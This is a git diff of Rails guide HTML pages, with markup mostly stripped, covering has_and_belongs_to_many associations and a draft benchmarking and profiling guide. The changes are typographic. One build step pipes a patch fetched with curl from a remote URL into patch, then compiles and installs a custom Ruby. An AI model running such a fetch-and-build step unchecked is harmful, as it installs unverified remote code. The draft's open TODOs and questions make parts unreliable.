The has_and_belongs_to_many association creates a many-to-many relationship with another model. In database terms, this associates two classes via an intermediate join table that includes foreign keys referring to each of the classes.

4.4.1. Methods Added

-

When you declare a has_and_belongs_to_many association, the declaring class automatically gains 13 methods related to the association:

-
    +

    When you declare a has_and_belongs_to_many association, the declaring class automatically gains 13 methods related to the association:

    +
    • collection(force_reload = false) @@ -1994,12 +1914,12 @@ http://www.gnu.org/software/src-highlite -->

    • -collection<<(object, …) +collection<<(object, ...)

    • -collection.delete(object, …) +collection.delete(object, ...)

    • @@ -2009,12 +1929,12 @@ http://www.gnu.org/software/src-highlite -->
    • -collection_singular_ids +collection\_singular\_ids

    • -collection_singular_ids=ids +collection\_singular\_ids=ids

    • @@ -2034,12 +1954,12 @@ http://www.gnu.org/software/src-highlite -->
    • -collection.find(…) +collection.find(...)

    • -collection.exist?(…) +collection.exist?(...)

    • @@ -2053,7 +1973,7 @@ http://www.gnu.org/software/src-highlite -->

    -

    In all of these methods, collection is replaced with the symbol passed as the first argument to has_many, and collection_singular is replaced with the singularized version of that symbol.. For example, given the declaration:

    +

    In all of these methods, collection is replaced with the symbol passed as the first argument to has_many, and collection\_singular is replaced with the singularized version of that symbol.. For example, given the declaration:

    class Part < ActiveRecord::Base
       has_and_belongs_to_many :assemblies
    -end
    -
    -

    Each instance of the part model will have these methods:

    +end
+

Each instance of the part model will have these methods:

-
@assemblies = @part.assemblies
-
-
collection<<(object, …)
-

The collection<< method adds one or more objects to the collection by creating records in the join table.

+
@assemblies = @part.assemblies
+
collection<<(object, ...)
+

The collection<< method adds one or more objects to the collection by creating records in the join table.

-
@part.assemblies << @assembly1
-
+
@part.assemblies << @assembly1
@@ -2119,33 +2035,31 @@ http://www.gnu.org/software/src-highlite --> This method is aliased as collection.concat and collection.push.
-
collection.delete(object, …)
-

The collection.delete method removes one or more objects from the collection by deleting records in the join table. This does not destroy the objects.

+
collection.delete(object, ...)
+

The collection.delete method removes one or more objects from the collection by deleting records in the join table. This does not destroy the objects.

-
@part.assemblies.delete(@assembly1)
-
+
@part.assemblies.delete(@assembly1)
collection=objects
-

The collection= method makes the collection contain only the supplied objects, by adding and deleting as appropriate.

-
collection_singular_ids
-

# Returns an array of the associated objects' ids

-

The collection_singular_ids method returns an array of the ids of the objects in the collection.

+

The collection= method makes the collection contain only the supplied objects, by adding and deleting as appropriate.

+
collection\_singular\_ids
+

# Returns an array of the associated objects' ids

+

The collection\_singular\_ids method returns an array of the ids of the objects in the collection.

-
@assembly_ids = @part.assembly_ids
-
-
collection_singular_ids=ids
-

The collection_singular_ids= method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate.

+
@assembly_ids = @part.assembly_ids
+
collection\_singular\_ids=ids
+

The collection\_singular\_ids= method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate.

collection.clear
-

The collection.clear method removes every object from the collection by deleting the rows from the joining tableassociation. This does not destroy the associated objects.

+

The collection.clear method removes every object from the collection by deleting the rows from the joining tableassociation. This does not destroy the associated objects.

collection.empty?
-

The collection.empty? method returns true if the collection does not contain any associated objects.

+

The collection.empty? method returns true if the collection does not contain any associated objects.

<% if @part.assemblies.empty? %>
   This part is not used in any assemblies
-<% end %>
-
+<% end %>
collection.size
-

The collection.size method returns the number of objects in the collection.

+

The collection.size method returns the number of objects in the collection.

-
@assembly_count = @part.assemblies.size
-
-
collection.find(…)
-

The collection.find method finds objects within the collection. It uses the same syntax and options as ActiveRecord::Base.find. It also adds the additional condition that the object must be in the collection.

+
@assembly_count = @part.assemblies.size
+
collection.find(...)
+

The collection.find method finds objects within the collection. It uses the same syntax and options as ActiveRecord::Base.find. It also adds the additional condition that the object must be in the collection.

-
@new_assemblies = @part.assemblies.find(:all, :conditions => ["created_at > ?", 2.days.ago])
-
-
collection.exist?(…)
-

The collection.exist? method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as ActiveRecord::Base.exists?.

-
collection.build(attributes = {})
-

The collection.build method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through the join table will be created, but the associated object will not yet be saved.

+
@new_assemblies = @part.assemblies.find(:all, :conditions => ["created_at > ?", 2.days.ago])
+
collection.exist?(...)
+

The collection.exist? method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as ActiveRecord::Base.exists?.

+
collection.build(attributes = {})
+

The collection.build method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through the join table will be created, but the associated object will not yet be saved.

-
@assembly = @part.assemblies.build({:assembly_name => "Transmission housing"})
-
+
@assembly = @part.assemblies.build({:assembly_name => "Transmission housing"})
collection.create(attributes = {})
-

The collection.create method returns a new object of the associated type. This objects will be instantiated from the passed attributes, the link through the join table will be created, and the associated object will be saved (assuming that it passes any validations).

+

The collection.create method returns a new object of the associated type. This objects will be instantiated from the passed attributes, the link through the join table will be created, and the associated object will be saved (assuming that it passes any validations).

-
@assembly = @part.assemblies.create({:assembly_name => "Transmission housing"})
-
+
@assembly = @part.assemblies.create({:assembly_name => "Transmission housing"})

4.4.2. Options for has_and_belongs_to_many

-

In many situations, you can use the default behavior for has_and_belongs_to_many without any customization. But you can alter that behavior in a number of ways. This section cover the options that you can pass when you create a has_and_belongs_to_many association. For example, an association with several options might look like this:

+

In many situations, you can use the default behavior for has_and_belongs_to_many without any customization. But you can alter that behavior in a number of ways. This section cover the options that you can pass when you create a has_and_belongs_to_many association. For example, an association with several options might look like this:

class Parts < ActiveRecord::Base
   has_and_belongs_to_many :assemblies, :uniq => true, :read_only => true
-end
-
-

The has_and_belongs_to_many association supports these options:

-
    +end
+

The has_and_belongs_to_many association supports these options:

+
  • :association_foreign_key @@ -2303,7 +2211,7 @@ http://www.gnu.org/software/src-highlite -->

:association_foreign_key
-

By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to the other model is the name of that model with the suffix _id added. The :association_foreign_key option lets you set the name of the foreign key directly:

+

By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to the other model is the name of that model with the suffix _id added. The :association_foreign_key option lets you set the name of the foreign key directly:

@@ -2320,10 +2228,9 @@ http://www.gnu.org/software/src-highlite -->
class User < ActiveRecord::Base
   has_and_belongs_to_many :friends, :class_name => "User",
     :foreign_key => "this_user_id", :association_foreign_key => "other_user_id"
-end
-
+end
:class_name
-

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if a part has many assemblies, but the actual name of the model containing assemblies is Gadget, you'd set things up this way:

+

If the name of the other model cannot be derived from the association name, you can use the :class_name option to supply the model name. For example, if a part has many assemblies, but the actual name of the model containing assemblies is Gadget, you’d set things up this way:

class Parts < ActiveRecord::Base
   has_and_belongs_to_many :assemblies, :class_name => "Gadget"
-end
-
+end
:conditions
-

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

+

The :conditions option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL WHERE clause).

class Parts < ActiveRecord::Base
   has_and_belongs_to_many :assemblies, :conditions => "factory = 'Seattle'"
-end
-
-

You can also set conditions via a hash:

+end +

You can also set conditions via a hash:

class Parts < ActiveRecord::Base
   has_and_belongs_to_many :assemblies, :conditions => { :factory => 'Seattle' }
-end
-
-

If you use a hash-style :conditions option, then record creation via this association will be automatically scoped using the hash. In this case, using @parts.assemblies.create or @parts.assemblies.build will create orders where the factory column has the value "Seattle".

+end +

If you use a hash-style :conditions option, then record creation via this association will be automatically scoped using the hash. In this case, using @parts.assemblies.create or @parts.assemblies.build will create orders where the factory column has the value "Seattle".

:counter_sql
-

Normally Rails automatically generates the proper SQL to count the association members. With the :counter_sql option, you can specify a complete SQL statement to count them yourself.

+

Normally Rails automatically generates the proper SQL to count the association members. With the :counter_sql option, you can specify a complete SQL statement to count them yourself.

- +
Note If you specify :finder_sql but not :counter_sql, then the counter SQL will be generated by substituting SELECT COUNT(*) FROM for the SELECT … FROM clause of your :finder_sql statement.If you specify :finder_sql but not :counter_sql, then the counter SQL will be generated by substituting SELECT COUNT(*) FROM for the SELECT ... FROM clause of your :finder_sql statement.
:delete_sql
-

Normally Rails automatically generates the proper SQL to remove links between the associated classes. With the :delete_sql option, you can specify a complete SQL statement to delete them yourself.

+

Normally Rails automatically generates the proper SQL to remove links between the associated classes. With the :delete_sql option, you can specify a complete SQL statement to delete them yourself.

:extend
-

The :extend option specifies a named module to extend the association proxy. Association extensions are discussed in detail later in this guide.

+

The :extend option specifies a named module to extend the association proxy. Association extensions are discussed in detail later in this guide.

:finder_sql
-

Normally Rails automatically generates the proper SQL to fetch the association members. With the :finder_sql option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary.

+

Normally Rails automatically generates the proper SQL to fetch the association members. With the :finder_sql option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary.

:foreign_key
-

By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to this model is the name of this model with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

+

By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to this model is the name of this model with the suffix _id added. The :foreign_key option lets you set the name of the foreign key directly:

class User < ActiveRecord::Base
   has_and_belongs_to_many :friends, :class_name => "User",
     :foreign_key => "this_user_id", :association_foreign_key => "other_user_id"
-end
-
+end
:group
-

The :group option supplies an attribute name to group the result set by, using a GROUP BY clause in the finder SQL.

+

The :group option supplies an attribute name to group the result set by, using a GROUP BY clause in the finder SQL.

class Parts < ActiveRecord::Base
   has_and_belongs_to_many :assemblies, :group => "factory"
-end
-
+end
:include
-

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used.

+

You can use the :include option to specify second-order associations that should be eager-loaded when this association is used.

:insert_sql
-

Normally Rails automatically generates the proper SQL to create links between the associated classes. With the :insert_sql option, you can specify a complete SQL statement to insert them yourself.

+

Normally Rails automatically generates the proper SQL to create links between the associated classes. With the :insert_sql option, you can specify a complete SQL statement to insert them yourself.

:join_table
-

If the default name of the join table, based on lexical ordering, is not what you want, you can use the :join_table option to override the default.

+

If the default name of the join table, based on lexical ordering, is not what you want, you can use the :join_table option to override the default.

:limit
-

The :limit option lets you restrict the total number of objects that will be fetched through an association.

+

The :limit option lets you restrict the total number of objects that will be fetched through an association.

class Parts < ActiveRecord::Base
   has_and_belongs_to_many :assemblies, :order => "created_at DESC", :limit => 50
-end
-
+end
:offset
-

The :offset option lets you specify the starting offset for fetching objects via an association. For example, if you set :offset ⇒ 11, it will skip the first 11 records.

+

The :offset option lets you specify the starting offset for fetching objects via an association. For example, if you set :offset => 11, it will skip the first 11 records.

:order
-

The :order option dictates the order in which associated objects will be received (in the syntax used by a SQL ORDER BY clause).

+

The :order option dictates the order in which associated objects will be received (in the syntax used by a SQL ORDER BY clause).

class Parts < ActiveRecord::Base
   has_and_belongs_to_many :assemblies, :order => "assembly_name ASC"
-end
-
+end
:readonly
-

If you set the :readonly option to true, then the associated objects will be read-only when retrieved via the association.

+

If you set the :readonly option to true, then the associated objects will be read-only when retrieved via the association.

:select
-

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns.

+

The :select option lets you override the SQL SELECT clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns.

:uniq
-

Specify the :uniq ⇒ true option to remove duplicates from the collection.

+

Specify the :uniq => true option to remove duplicates from the collection.

:validate
-

If you set the :validate option to false, then associated objects will not be validated whenever you save this object. By default, this is true: associated objects will be validated when this object is saved.

+

If you set the :validate option to false, then associated objects will not be validated whenever you save this object. By default, this is true: associated objects will be validated when this object is saved.

4.4.3. When are Objects Saved?

-

When you assign an object to a has_and_belongs_to_many association, that object is automatically saved (in order to update the join table). If you assign multiple objects in one statement, then they are all saved.

-

If any of these saves fails due to validation errors, then the assignment statement returns false and the assignment itself is cancelled.

-

If the parent object (the one declaring the has_and_belongs_to_many association) is unsaved (that is, new_record? returns true) then the child objects are not saved when they are added. All unsaved members of the association will automatically be saved when the parent is saved.

-

If you want to assign an object to a has_and_belongs_to_many association without saving the object, use the collection.build method.

+

When you assign an object to a has_and_belongs_to_many association, that object is automatically saved (in order to update the join table). If you assign multiple objects in one statement, then they are all saved.

+

If any of these saves fails due to validation errors, then the assignment statement returns false and the assignment itself is cancelled.

+

If the parent object (the one declaring the has_and_belongs_to_many association) is unsaved (that is, new_record? returns true) then the child objects are not saved when they are added. All unsaved members of the association will automatically be saved when the parent is saved.

+

If you want to assign an object to a has_and_belongs_to_many association without saving the object, use the collection.build method.

4.5. Association Callbacks

-

Normal callbacks hook into the lifecycle of Active Record objects, allowing you to work with those objects at various points. For example, you can use a :before_save callback to cause something to happen just before an object is saved.

-

Association callbacks are similar to normal callbacks, but they are triggered by events in the lifecycle of a collection. There are four available association callbacks:

-
    +

    Normal callbacks hook into the lifecycle of Active Record objects, allowing you to work with those objects at various points. For example, you can use a :before_save callback to cause something to happen just before an object is saved.

    +

    Association callbacks are similar to normal callbacks, but they are triggered by events in the lifecycle of a collection. There are four available association callbacks:

    +
    • before_add @@ -2462,7 +2362,7 @@ http://www.gnu.org/software/src-highlite -->

    -

    You define association callbacks by adding options to the association declaration. For example:

    +

    You define association callbacks by adding options to the association declaration. For example:

    def check_credit_limit(order) ... end -end -
    -

    Rails passes the object being added or removed to the callback.

    -

    You can stack callbacks on a single event by passing them as an array:

    +end
+

Rails passes the object being added or removed to the callback.

+

You can stack callbacks on a single event by passing them as an array:

def calculate_shipping_charges(order) ... end -end -
-

If a before_add callback throws an exception, the object does not get added to the collection. Similarly, if a before_remove callback throws an exception, the object does not get removed from the collection.

+end +

If a before_add callback throws an exception, the object does not get added to the collection. Similarly, if a before_remove callback throws an exception, the object does not get removed from the collection.

4.6. Association Extensions

-

You're not limited to the functionality that Rails automatically builds into association proxy objects. You can also extend these objects through anonymous modules, adding new finders, creators, or other methods. For example:

+

You’re not limited to the functionality that Rails automatically builds into association proxy objects. You can also extend these objects through anonymous modules, adding new finders, creators, or other methods. For example:

find_by_region_id(order_number[0..2]) end end -end -
-

If you have an extension that should be shared by many associations, you can use a named extension module. For example:

+end +

If you have an extension that should be shared by many associations, you can use a named extension module. For example:

class Supplier < ActiveRecord::Base has_many :deliveries, :extend => FindRecentExtension -end -
-

To include more than one extension module in a single association, specify an array of names:

+end +

To include more than one extension module in a single association, specify an array of names:

class Customer < ActiveRecord::Base
   has_many :orders, :extend => [FindRecentExtension, FindActiveExtension]
-end
-
-

Extensions can refer to the internals of the association proxy using these three accessors:

-
    +end
+

Extensions can refer to the internals of the association proxy using these three accessors:

+
  • proxy_owner returns the object that the association is a part of. @@ -2562,8 +2457,8 @@ http://www.gnu.org/software/src-highlite -->

5. Changelog

- -
    + +
    • September 28, 2008: Corrected has_many :through diagram, added polymorphic diagram, some reorganization by Mike Gunderloy . First release version. diff --git a/railties/doc/guides/html/authors.html b/railties/doc/guides/html/authors.html index 6fd556d2cd..abcb1a8774 100644 --- a/railties/doc/guides/html/authors.html +++ b/railties/doc/guides/html/authors.html @@ -202,39 +202,39 @@ ul#navMain {

      diff --git a/railties/doc/guides/html/benchmarking_and_profiling.html b/railties/doc/guides/html/benchmarking_and_profiling.html index 9bd1c10dc8..7a50e5a68c 100644 --- a/railties/doc/guides/html/benchmarking_and_profiling.html +++ b/railties/doc/guides/html/benchmarking_and_profiling.html @@ -222,7 +222,7 @@ ul#navMain {
    • Preparing Ruby and Ruby-prof
    • -
    • Installing Jeremy Kemper's ruby-prof
    • +
    • Installing Jeremy Kemper’s ruby-prof
    • Generating performance test
    • @@ -287,8 +287,8 @@ ul#navMain {

      Benchmarking and Profiling Rails

      -

      This guide covers the benchmarking and profiling tactics/tools of Rails and Ruby in general. By referring to this guide, you will be able to:

      -
        +

        This guide covers the benchmarking and profiling tactics/tools of Rails and Ruby in general. By referring to this guide, you will be able to:

        +
        • Understand the various types of benchmarking and profiling metrics @@ -319,13 +319,13 @@ Learn about various tools facilitating benchmarking and profiling

        1. Why Benchmark and Profile ?

        -

        Benchmarking and Profiling is an integral part of the development cycle. It is very important that you don't make your end users wait for too long before the page is completely loaded. Ensuring a plesant browsing experience to the end users and cutting cost of unnecessary hardwares is important for any web application.

        +

        Benchmarking and Profiling is an integral part of the development cycle. It is very important that you don’t make your end users wait for too long before the page is completely loaded. Ensuring a plesant browsing experience to the end users and cutting cost of unnecessary hardwares is important for any web application.

        1.1. What is the difference between benchmarking and profiling ?

        -

        Benchmarking is the process of finding out if a piece of code is slow or not. Whereas profiling is the process of finding out what exactly is slowing down that piece of code.

        +

        Benchmarking is the process of finding out if a piece of code is slow or not. Whereas profiling is the process of finding out what exactly is slowing down that piece of code.

        2. Using and understanding the log files

        -

        Rails logs files containt basic but very useful information about the time taken to serve every request. A typical log entry looks something like :

        +

        Rails logs files containt basic but very useful information about the time taken to serve every request. A typical log entry looks something like :

        Parameters: {"action"=>"index", "controller"=>"items"} Rendering template within layouts/items Rendering items/index -Completed in 5ms (View: 2, DB: 0) | 200 OK [http://localhost/items] -
        -

        For this section, we're only interested in the last line from that log entry:

        +Completed in 5ms (View: 2, DB: 0) | 200 OK [http://localhost/items]
      +

      For this section, we’re only interested in the last line from that log entry:

      -
      Completed in 5ms (View: 2, DB: 0) | 200 OK [http://localhost/items]
      -
      -

      This data is fairly straight forward to understand. Rails uses millisecond(ms) as the metric to measures the time taken. The complete request spent 5 ms inside Rails, out of which 2 ms were spent rendering views and none was spent communication with the database. It's safe to assume that the remaining 3 ms were spent inside the controller.

      +
      Completed in 5ms (View: 2, DB: 0) | 200 OK [http://localhost/items]
      +

      This data is fairly straight forward to understand. Rails uses millisecond(ms) as the metric to measures the time taken. The complete request spent 5 ms inside Rails, out of which 2 ms were spent rendering views and none was spent communication with the database. It’s safe to assume that the remaining 3 ms were spent inside the controller.

    3. Helper methods

    -

    Rails provides various helper methods inside Active Record, Action Controller and Action View to measure the time taken by a specific code. The method is called benchmark() in all three components.

    +

    Rails provides various helper methods inside Active Record, Action Controller and Action View to measure the time taken by a specific code. The method is called benchmark() in all three components.

    project = Project.create("name" => "stuff") project.create_manager("name" => "David") project.milestones << Milestone.find(:all) -end -
    -

    The above code benchmarks the multiple statments enclosed inside Project.benchmark("Creating project") do..end block and prints the results inside log files. The statement inside log files will look like:

    +end
+

The above code benchmarks the multiple statments enclosed inside Project.benchmark("Creating project") do..end block and prints the results inside log files. The statement inside log files will look like:

-
Creating projectem (185.3ms)
-
-

Please refer to API docs for optional options to benchmark()

-

Similarly, you could use this helper method inside controllers ( Note that it's a class method here ):

+
Creating projectem (185.3ms)
+

Please refer to API docs for optional options to benchmark()

+

Similarly, you could use this helper method inside controllers ( Note that it’s a class method here ):

Project.process(params[:project_ids]) Project.update_cached_projects end -end -
-

and views:

+end +

and views:

<% benchmark("Showing projects partial") do %>
   <%= render :partial => @projects %>
-<% end %>
-
+<% end %>

4. Performance Test Cases

-

Rails provides a very easy to write performance test cases, which look just like the regular integration tests.

-

If you have a look at test/performance/browsing_test.rb in a newly created Rails application:

+

Rails provides a very easy to write performance test cases, which look just like the regular integration tests.

+

If you have a look at test/performance/browsing_test.rb in a newly created Rails application:

def test_homepage get '/' end -end -
-

This is an automatically generated example performance test file, for testing performance of homepage(/) of the application.

+end
+

This is an automatically generated example performance test file, for testing performance of homepage(/) of the application.

4.1. Modes

4.1.1. Benchmarking

4.1.2. Profiling

4.2. Metrics

4.2.1. Process Time

-

CPU Cycles.

+

CPU Cycles.

4.2.2. Memory

-

Memory taken.

+

Memory taken.

4.2.3. Objects

-

Objects allocated.

+

Objects allocated.

4.2.4. GC Runs

-

Number of times the Ruby GC was run.

+

Number of times the Ruby GC was run.

4.2.5. GC Time

-

Time spent running the Ruby GC.

+

Time spent running the Ruby GC.

4.3. Preparing Ruby and Ruby-prof

-

Before we go ahead, Rails performance testing requires you to build a special Ruby binary with some super powers - GC patch for measuring GC Runs/Time. This process is very straight forward. If you've never compiled a Ruby binary before, you can follow the following steps to build a ruby binary inside your home directory:

+

Before we go ahead, Rails performance testing requires you to build a special Ruby binary with some super powers - GC patch for measuring GC Runs/Time. This process is very straight forward. If you’ve never compiled a Ruby binary before, you can follow the following steps to build a ruby binary inside your home directory:

4.3.1. Compile

[lifo@null ~]$ cd ruby-1.8.6-p111 [lifo@null ruby-1.8.6-p111]$ curl http://rubyforge.org/tracker/download.php/1814/7062/17676/3291/ruby186gc.patch | patch -p0 [lifo@null ruby-1.8.6-p111]$ ./configure --prefix=/Users/lifo/rubygc -[lifo@null ruby-1.8.6-p111]$ make && make install -
+[lifo@null ruby-1.8.6-p111]$ make && make install

4.3.2. Prepare aliases

-

Add the following lines in your ~/.profile for convenience:

+

Add the following lines in your ~/.profile for convenience:

alias gcruby='/Users/lifo/rubygc/bin/ruby'
@@ -471,15 +463,15 @@ alias gcrails='/Users/lifo/rubygc/bin/rails'
[lifo@null ~]$ gcgem install mysql
-

If this fails, you can try to install it manually:

+

If this fails, you can try to install it manually:

[lifo@null ~]$ cd /Users/lifo/rubygc/lib/ruby/gems/1.8/gems/mysql-2.7/
 [lifo@null mysql-2.7]$ gcruby extconf.rb --with-mysql-config
 [lifo@null mysql-2.7]$ make && make install
-

4.4. Installing Jeremy Kemper's ruby-prof

-

We also need to install Jeremy's ruby-prof gem using our newly built ruby:

+

4.4. Installing Jeremy Kemper’s ruby-prof

+

We also need to install Jeremy’s ruby-prof gem using our newly built ruby:

[lifo@null ~]$ git clone git://github.com/jeremy/ruby-prof.git
 [lifo@null ~]$ cd ruby-prof/
 [lifo@null ruby-prof (master)]$ gcrake gem
-[lifo@null ruby-prof (master)]$ gcgem install pkg/ruby-prof-0.6.1.gem
-
+[lifo@null ruby-prof (master)]$ gcgem install pkg/ruby-prof-0.6.1.gem

4.5. Generating performance test

-

Rails provides a simple generator for creating new performance tests:

+

Rails provides a simple generator for creating new performance tests:

-
[lifo@null application (master)]$ script/generate performance_test homepage
-
-

This will generate test/performance/homepage_test.rb:

+
[lifo@null application (master)]$ script/generate performance_test homepage
+

This will generate test/performance/homepage_test.rb:

def test_homepage get '/' end -end -
-

Which you can modify to suit your needs.

+end +

Which you can modify to suit your needs.

4.6. Running tests

5. Understanding Performance Tests Outputs

5.1. Our First Performance Test

-

So how do we profile a request.

-

One of the things that is important to us is how long it takes to render the home page - so let's make a request to the home page. Once the request is complete, the results will be outputted in the terminal.

-

In the terminal run

+

So how do we profile a request.

+

One of the things that is important to us is how long it takes to render the home page - so let’s make a request to the home page. Once the request is complete, the results will be outputted in the terminal.

+

In the terminal run

-
[User profiling_tester]$ gcruby tests/performance/homepage.rb
-
-

After the tests runs for a few seconds you should see something like this.

+
[User profiling_tester]$ gcruby tests/performance/homepage.rb
+

After the tests runs for a few seconds you should see something like this.

HomepageTest#test_homepage (19 ms warmup)
@@ -541,8 +529,8 @@ http://www.gnu.org/software/src-highlite -->
 
 Finished in 2.207428 seconds.
-

Simple but efficient.

-
    +

    Simple but efficient.

    +
    • Process Time refers to amount of time necessary to complete the action. @@ -559,9 +547,9 @@ object ??? #TODO find a good definition. Is it the amount of objects put into a

    -

    In addition we also gain three types of itemized log files for each of these outputs. They can be found in your tmp directory of your application.

    -

    The Three types are

    -
      +

      In addition we also gain three types of itemized log files for each of these outputs. They can be found in your tmp directory of your application.

      +

      The Three types are

      +
      • Flat File - A simple text file with the data laid out in a grid @@ -586,12 +574,12 @@ Tree File - A file output that can be use in conjunction with KCachegrind to vis

KCachegrind is Linux only. For Mac this means you have to do a full KDE install to have it working in your OS. Which is over 3 gigs in size. For windows there is clone called wincachegrind but it is no longer actively being developed.
-

Below are examples for Flat Files and Graphical Files

+

Below are examples for Flat Files and Graphical Files

5.2. Flat Files

-
Example: Flat File Output Processing Time
+
Flat File Output Processing Time
-

Thread ID: 2279160 +

Thread ID: 2279160 Total: 0.026097

@@ -615,8 +603,8 @@ Total: 0.026097

0.18 0.00 0.00 0.00 0.00 17 <Class::Object>#allocate
-

So what do these columns tell us:

-
    +

    So what do these columns tell us:

    +
    • %self - The percentage of time spent processing the method. This is derived from self_time/total_time @@ -639,7 +627,7 @@ wait - Time processed was queued

    • -child - The time spent in this method's children. +child - The time spent in this method’s children.

    • @@ -653,16 +641,16 @@ name - The name of the method.

    -

    Name can be displayed three seperate ways: - #toplevel - The root method that calls all other methods - MyObject#method - Example Hash#each, The class Hash is calling the method each +

    Name can be displayed three seperate ways: + * #toplevel - The root method that calls all other methods + * MyObject#method - Example Hash#each, The class Hash is calling the method each * <Object:MyObject>#test - The <> characters indicate a singleton method on a singleton class. Example <Class::Object>#allocate

    -

    Methods are sorted based on %self. Hence the ones taking the most time and resources will be at the top.

    -

    So for Array#each which is calling each on the class array. We find that it processing time is 2% of the total and was called 15 times. The rest of the information is 0.00 because the process is so fast it isn't recording times less then 100 ms.

    +

    Methods are sorted based on %self. Hence the ones taking the most time and resources will be at the top.

    +

    So for Array#each which is calling each on the class array. We find that it processing time is 2% of the total and was called 15 times. The rest of the information is 0.00 because the process is so fast it isn’t recording times less then 100 ms.

    -
    Example: Flat File Memory Output
    +
    Flat File Memory Output
    -

    Thread ID: 2279160 +

    Thread ID: 2279160 Total: 509.724609

    @@ -676,12 +664,12 @@ Total: 509.724609

    1.01 5.13 5.13 0.00 0.00 27 Array#-
    -

    Very similar to the processing time format. The main difference here is that instead of calculating time we are now concerned with the amount of KB put into memory (or is it strictly into the heap) can I get clarification on this minor point?

    -

    So for <Module::YAML>#quick_emit which is singleton method on the class YAML it uses 57.66 KB in total, 23.57 through its own actions, 6.69 from actions it calls itself and that it was called twice.

    +

    Very similar to the processing time format. The main difference here is that instead of calculating time we are now concerned with the amount of KB put into memory (or is it strictly into the heap) can I get clarification on this minor point?

    +

    So for <Module::YAML>#quick_emit which is singleton method on the class YAML it uses 57.66 KB in total, 23.57 through its own actions, 6.69 from actions it calls itself and that it was called twice.

    -
    Example: Flat File Objects
    +
    Flat File Objects
    -

    Thread ID: 2279160 +

    Thread ID: 2279160 Total: 6537.000000

    @@ -700,13 +688,13 @@ Total: 6537.000000

    #TODO Find correct terminology for how to describe what this is exactly profiling as in are there really 2203 array objects or 2203 pointers to array objects?.

    5.3. Graph Files

    -

    While the information gleamed from flat files is very useful we still don't know which processes each method is calling. We only know how many. This is not true for a graph file. Below is a text representation of a graph file. The actual graph file is an html entity and an example of which can be found Here

    -

    #TODO (Handily the graph file has links both between it many processes and to the files that actually contain them for debugging. +

    While the information gleamed from flat files is very useful we still don’t know which processes each method is calling. We only know how many. This is not true for a graph file. Below is a text representation of a graph file. The actual graph file is an html entity and an example of which can be found Here

    +

    #TODO (Handily the graph file has links both between it many processes and to the files that actually contain them for debugging. )

    -
    Example: Graph File
    +
    Graph File
    -

    Thread ID: 21277412

    +

    Thread ID: 21277412

      %total   %self     total      self    children               calls   Name
    @@ -727,26 +715,26 @@ Total: 6537.000000

    /____________________________________________________________________________/
    -

    As you can see the calls have been separated into slices, no longer is the order determined by process time but instead from hierarchy. Each slice profiles a primary entry, with the primary entry's parents being shown above itself and it's children found below. A primary entry can be ascertained by it having values in the %total and %self columns. Here the main entry here have been bolded for connivence.

    -

    So if we look at the last slice. The primary entry would be Array#each_index. It takes 0.18% of the total process time and it is only called once. It is called from Object#make_random_array which is only called once. It's children are Kernal.rand which is called by it all 500 its times that it was call in this action and Arry#[]= which was called 500 times by Array#each_index and once by some other entry.

    +

    As you can see the calls have been separated into slices, no longer is the order determined by process time but instead from hierarchy. Each slice profiles a primary entry, with the primary entry’s parents being shown above itself and it’s children found below. A primary entry can be ascertained by it having values in the %total and %self columns. Here the main entry here have been bolded for connivence.

    +

    So if we look at the last slice. The primary entry would be Array#each_index. It takes 0.18% of the total process time and it is only called once. It is called from Object#make_random_array which is only called once. It’s children are Kernal.rand which is called by it all 500 its times that it was call in this action and Arry#[]= which was called 500 times by Array#each_index and once by some other entry.

    5.4. Tree Files

    -

    It's pointless trying to represent a tree file textually so here's a few pretty pictures of it's usefulness

    -
    KCachegrind Graph

    +

    It’s pointless trying to represent a tree file textually so here’s a few pretty pictures of it’s usefulness

    +
    KCachegrind Graph

    Graph created by KCachegrind

    -
    KCachegrind List

    +

    KCachegrind List

    List created by KCachegrind

    -

    #TODO Add a bit more information to this.

    +

    #TODO Add a bit more information to this.

    6. Getting to the Point of all of this

    -

    Now I know all of this is a bit dry and academic. But it's a very powerful tool when you know how to leverage it properly. Which we are going to take a look at in our next section

    +

    Now I know all of this is a bit dry and academic. But it’s a very powerful tool when you know how to leverage it properly. Which we are going to take a look at in our next section

    7. Real Life Example

    7.1. The setup

    -

    So I have been building this application for the last month and feel pretty good about the ruby code. I'm readying it for beta testers when I discover to my shock that with less then twenty people it starts to crash. It's a pretty simple Ecommerce site so I'm very confused by what I'm seeing. On running looking through my log files I find to my shock that the lowest time for a page run is running around 240 ms. My database finds aren't the problems so I'm lost as to what is happening to cause all this. Lets run a benchmark.

    +

    So I have been building this application for the last month and feel pretty good about the ruby code. I’m readying it for beta testers when I discover to my shock that with less then twenty people it starts to crash. It’s a pretty simple Ecommerce site so I’m very confused by what I’m seeing. On running looking through my log files I find to my shock that the lowest time for a page run is running around 240 ms. My database finds aren’t the problems so I’m lost as to what is happening to cause all this. Lets run a benchmark.

    def test_homepage get '/' end -end -
    +end
    -
    Example: Output
    +
    Output
    HomepageTest#test_homepage (115 ms warmup)
             process_time: 591 ms
             memory: 3052.90 KB
             objects: 59471
    -

    Obviously something is very very wrong here. 3052.90 Kb to load my minimal homepage. For Comparison for another site running well I get this for my homepage test.

    +

    Obviously something is very very wrong here. 3052.90 Kb to load my minimal homepage. For Comparison for another site running well I get this for my homepage test.

    -
    Example: Default
    +
    Default
    HomepageTest#test_homepage (19 ms warmup)
             process_time: 26 ms
                   memory: 298.79 KB
                  objects: 1917
